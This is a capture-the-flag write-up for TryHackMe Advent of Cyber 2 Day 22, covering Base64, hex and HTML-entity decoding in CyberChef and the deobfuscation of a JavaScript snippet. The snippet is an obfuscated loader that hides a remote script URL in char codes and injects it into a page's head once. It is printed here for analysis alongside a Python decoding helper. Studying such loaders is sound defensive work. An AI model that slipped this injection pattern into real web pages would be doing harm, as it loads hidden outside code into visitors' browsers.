TryHackMe — Advent of Cyber 2 — Day 22

Trent Darrow
Dec 23, 2020

Good afternoon everyone,

Today we continue the Blue Team saga. Reading through the tasks, we are dealing with a KeePass password manager database and several different encodings. Anyhow, today’s intro:

“The past few days there have been strange things happening at Best Festival Company. McEager hasn’t had the time to fully investigate the compromised endpoints with everything that is going on nor does he have the time to reimage the workstations. McEager decides to log into a different workstation, one of his backup systems.

McEager logs in and to his dismay he can’t log into his password manager. It’s not accepting his master key! He notices that the folder name has been renamed to something strange.”

First we can RDP into the machine (should be fun, once again on my terrible connection..). Right away we see this folder on the desktop; at first glance it looks like the name is encoded in Base64. We will load up CyberChef and take a look.

Looks like the Grinch has visited here, and it was Base64.

This also happens to be the master password for the KeePass database. So, let’s take a look inside there.

We have usernames and passwords for a security system, email, and the elf server. They are encoded, but luckily whoever created the entries left us hints in the notes of the database.

Question 2: What is the encoding method listed as the ‘Matching ops’?

For this we need to use the Magic operation in CyberChef. It just tells us what we already know.

Question 3: What is the decoded password value of the Elf Server?

Here is the entry for the Elf Server.

Let’s just put it into CyberChef and use From Hex. Easy enough.

Question 4: What is the decoded password value for ElfMail?

Let’s take a peek at the encoded password and see what it looks like.

Well, these notes give away the answer pretty easily with CyberChef. It was an HTML Entity.

And onto the final Question: Decode the last encoded value. What is the flag?

Inside the Recycling Bin folder, we see this:

Alrighty, it seems we have a lot more data here, so let’s take a better look. Once we place it into CyberChef, we can see right away that it is building a string with From CharCode.

We can remove some syntax and let CyberChef do the work for us.

Now we are left with some JavaScript. Below, I have copied and pasted the output data for easier reading.

var somestring = document.createElement('script');
somestring.type = 'text/javascript';
somestring.async = true;
// The script source is hidden as a list of char codes (decoded below the block)
somestring.src = String.fromCharCode(104, 104, 116, 116, 112, 115, 58, 47, 47, 103, 105, 115, 116, 46, 103, 105, 116, 104, 117, 98, 46, 99, 111, 109, 47, 104, 101, 97, 118, 101, 110, 114, 97, 105, 122, 97, 47);
var alls = document.getElementsByTagName('script');
var nt3 = true;
// Only inject once: skip if a script whose src contains the hidden marker already exists
for (var i = alls.length; i--;) {
  if (alls[i].src.indexOf(String.fromCharCode(49, 49, 100, 51, 50, 49, 50, 52, 52, 99, 52, 100, 54, 54, 55, 52, 52, 54, 100, 98, 102, 100, 57, 97, 51, 50, 57, 56, 97, 56, 56, 98, 56)) > -1) { nt3 = false; }
}
if (nt3 == true) { document.getElementsByTagName("head")[0].appendChild(somestring); }

If we decode the first CharCode section, we get ‘hhttps://gist.github.com/heavenraiza/’

If we decode the second section, we get a random character string:

11d321244c4d667446dbfd9a3298a88b8
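The same decoding CyberChef does for the two String.fromCharCode sections, as a small Python script added here for readers who want to do it offline (it is not part of the original post, and the hypothetical helper names are mine; the constructed sample input is the loader from the writeup trimmed to the two lines that carry the encoded strings):

```python
import json
import re

# Constructed sample: the two lines of the obfuscated loader that hide strings
# behind String.fromCharCode(...). Values are copied from the writeup above.
OBFUSCATED_JS = r"""
somestring.src = String.fromCharCode(104, 104, 116, 116, 112, 115, 58, 47, 47, 103, 105, 115, 116, 46, 103, 105, 116, 104, 117, 98, 46, 99, 111, 109, 47, 104, 101, 97, 118, 101, 110, 114, 97, 105, 122, 97, 47);
if (alls[i].src.indexOf(String.fromCharCode(49, 49, 100, 51, 50, 49, 50, 52, 52, 99, 52, 100, 54, 54, 55, 52, 52, 54, 100, 98, 102, 100, 57, 97, 51, 50, 57, 56, 97, 56, 56, 98, 56)) > -1) { nt3 = false; }
"""

# Matches a fromCharCode call whose arguments are only numeric literals.
FROM_CHARCODE = re.compile(r"String\.fromCharCode\(\s*([0-9,\s]+?)\s*\)")


def decode_charcodes(arg_text: str) -> str:
    """Turn a comma-separated list of code points into the string it hides."""
    return "".join(chr(int(n)) for n in arg_text.split(",") if n.strip())


def extract_charcode_strings(js: str) -> list:
    """Return every decoded String.fromCharCode(...) literal, in source order."""
    return [decode_charcodes(m.group(1)) for m in FROM_CHARCODE.finditer(js)]


def deobfuscate(js: str) -> str:
    """Rewrite the script with each fromCharCode call replaced by a plain
    JS string literal (json.dumps produces a JS-compatible quoted string)."""
    return FROM_CHARCODE.sub(lambda m: json.dumps(decode_charcodes(m.group(1))), js)


if __name__ == "__main__":
    for hidden in extract_charcode_strings(OBFUSCATED_JS):
        print(hidden)
    print(deobfuscate(OBFUSCATED_JS))
```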

I tried to decode it, but couldn’t figure it out. Tried to set up the whole thing wrapped in an HTML file from the output section. Couldn’t get the function to work. And since the GitHub page had the flag… well, I stopped trying to get it to work. Anyway, that is it for today.

As always, best of luck. If you enjoy my content, feel free to add me on LinkedIn and let me know you saw the blog.

Until next time,

-3lduderino
